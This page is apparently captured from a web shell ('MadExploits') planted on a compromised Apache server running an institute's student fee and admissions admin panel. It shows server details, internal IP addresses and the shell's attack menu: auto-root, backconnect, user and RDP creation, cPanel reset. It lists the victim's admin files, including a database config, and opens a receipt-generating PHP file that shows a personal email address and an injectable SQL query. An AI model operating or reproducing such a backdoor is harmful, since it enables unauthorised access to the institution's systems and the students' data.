Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipdapplication /
old /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
adAdminUser.php
7.42
KB
-rw-r--r--
adminDashboard-old.php
7.28
KB
-rw-r--r--
adminDashboard.php
7.85
KB
-rw-r--r--
batch.php
344
B
-rw-r--r--
changePassword.php
4.61
KB
-rw-r--r--
class.admin.php
4.23
KB
-rw-r--r--
common.php
2.28
KB
-rw-r--r--
dbconfig.php
1.19
KB
-rw-r--r--
delete_member.php
446
B
-rw-r--r--
delete_memberD.php
456
B
-rw-r--r--
error_log
2.03
KB
-rw-r--r--
exportHostelFee.php
1.17
KB
-rw-r--r--
exportStudentApplicatonDetails...
2.64
KB
-rw-r--r--
exportStudentDetails.php
915
B
-rw-r--r--
exportStudentDetailsaug22.php
0
B
-rw-r--r--
exportStudentDetailsjan22.php
754
B
-rw-r--r--
exportTutionFee.php
1.22
KB
-rw-r--r--
exportTutionFeeSearch.php
1.22
KB
-rw-r--r--
exportcseduApplicatonDetails.p...
1.08
KB
-rw-r--r--
exportcseduApplicatonDetailsau...
1.09
KB
-rw-r--r--
exportcseduApplicatonDetailsja...
1.09
KB
-rw-r--r--
exportcseduFeeDetails.php
817
B
-rw-r--r--
exportcseduFeeDetailsaug22.php
830
B
-rw-r--r--
exportcseduFeeDetailsjan22.php
830
B
-rw-r--r--
forgotPassword.php
6.53
KB
-rw-r--r--
fpass.php
2.97
KB
-rw-r--r--
generatereceipt.php
4.1
KB
-rw-r--r--
index.php
4.8
KB
-rw-r--r--
invoice.php
5.78
KB
-rw-r--r--
invoiceHostel.php
4.9
KB
-rw-r--r--
jquery.tableToExcel.js
2.76
KB
-rw-r--r--
logout.php
600
B
-rw-r--r--
register.php
6.62
KB
-rw-r--r--
resetpass.php
5.09
KB
-rw-r--r--
tutionFee.php
19.89
KB
-rw-r--r--
updateBatch.php
5.9
KB
-rw-r--r--
updateBatchFee.php
7.1
KB
-rw-r--r--
updateFeeDate.php
9.87
KB
-rw-r--r--
verify.php
2.46
KB
-rw-r--r--
viewApplicationDetailsaug22.ph...
6.18
KB
-rw-r--r--
viewApplicationDetailsjan22.ph...
6.18
KB
-rw-r--r--
viewApplicatonDetails.php
6.16
KB
-rw-r--r--
viewHostelFee.php
9.22
KB
-rw-r--r--
viewPaymentDetails.php
4.86
KB
-rw-r--r--
viewPaymentDetailsaug22.php
4.89
KB
-rw-r--r--
viewPaymentDetailsjan22.php
4.91
KB
-rw-r--r--
viewStudentDetails-old.php
13.75
KB
-rw-r--r--
viewStudentDetails.php
20.86
KB
-rw-r--r--
viewTutionFee.php
9.46
KB
-rw-r--r--
viewapplications.php
13.75
KB
-rw-r--r--
viewapplicationsjan22.php
14.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : generatereceipt.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; $tokenAuth = $row[ 'authtokenid' ]; ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Fee Receipt for CSEDU Course <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active"> Fee Receipt for CSEDU Course</li> </ol> </section> <!-- /.content --> <section class="content"> <div class="row"> <div class="col-xs-12" style="padding-left: 0px; padding-right: 0px;"> <div class="box"> <!-- <div class="box-header"> <h3 class="box-title"> <center> <strong>Successfully Applied Candidates List</strong> </center> </h3> </div>--> <?php /* Why these lines are giving issue. plz check 06072023 $emailID="arunsunb@srmist.edu.in"; $result = $DB_con->prepare( "SELECT * FROM applicationfees where emailID='$emailID'" ); $result->execute(); for ( $i = 0; $row3 = $result->fetch(); $i++ ) {*/ ?> <!-- /.box-header --> <div class="box-body" id="printableArea"> <center><table id="example1" class="table table-bordered table-striped" style=" width: 765px;"> <tbody> <tr><td colspan="2" style="text-align:center; font-size:16px;"><img src="https://csedu.iiitd.ac.in/img/logo.png"/><br/><h3><strong>Fee Receipt for CSEDU Course</strong></h3></td></tr> <tr> <td><label><strong>Name</strong></label></td> <td><?php echo $row3['studentName'] ?></td> </tr> <tr> <td><label><strong>Email Id</strong></label></td> <td><?php echo $row3['emailID'] ?></td> </tr> <tr> <td><label><strong>Application No</strong></label></td> <td><?php echo $row3['applicationNo'] ?></td> </tr> <tr> <td><label><strong>Module</strong></label></td> <td><?php echo $row3['course'] ?></td> </tr> <tr> <td><strong>Application Fee (Rs.)</strong></td> <td><?php echo $row3['applicationFeeAm'] ?></td> </tr> <tr> <td><strong>Order ID</strong></td> <td><?php echo $row3['razorpay_order_id'] ?></td> </tr> <tr> <td><strong>Payment ID</strong></td> <td><?php echo $row3['razorpay_payment_id']; ?></td> </tr> <tr> <td><strong>Fee Status</strong></td> <td><?php echo $row3['paymentStatus'] ?></td> </tr> <tr> <td><label><strong>Fee Submission Date (yyyy-mm-dd h:m:s)</strong></label></td> <td><?php echo $row3['paymentdate'] ?></td> </tr> </tfoot> </table> </center> <br/><center><button class="btn btn-primary hidden-print" onClick="printDiv('printableArea')"><span class="glyphicon glyphicon-print" aria-hidden="true"></span> Print</button></center> </div> <!-- /.box-body --> </div> <!-- /.box --> </div> <!-- /.col --> </div> <!-- /.row --> </section> </div> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close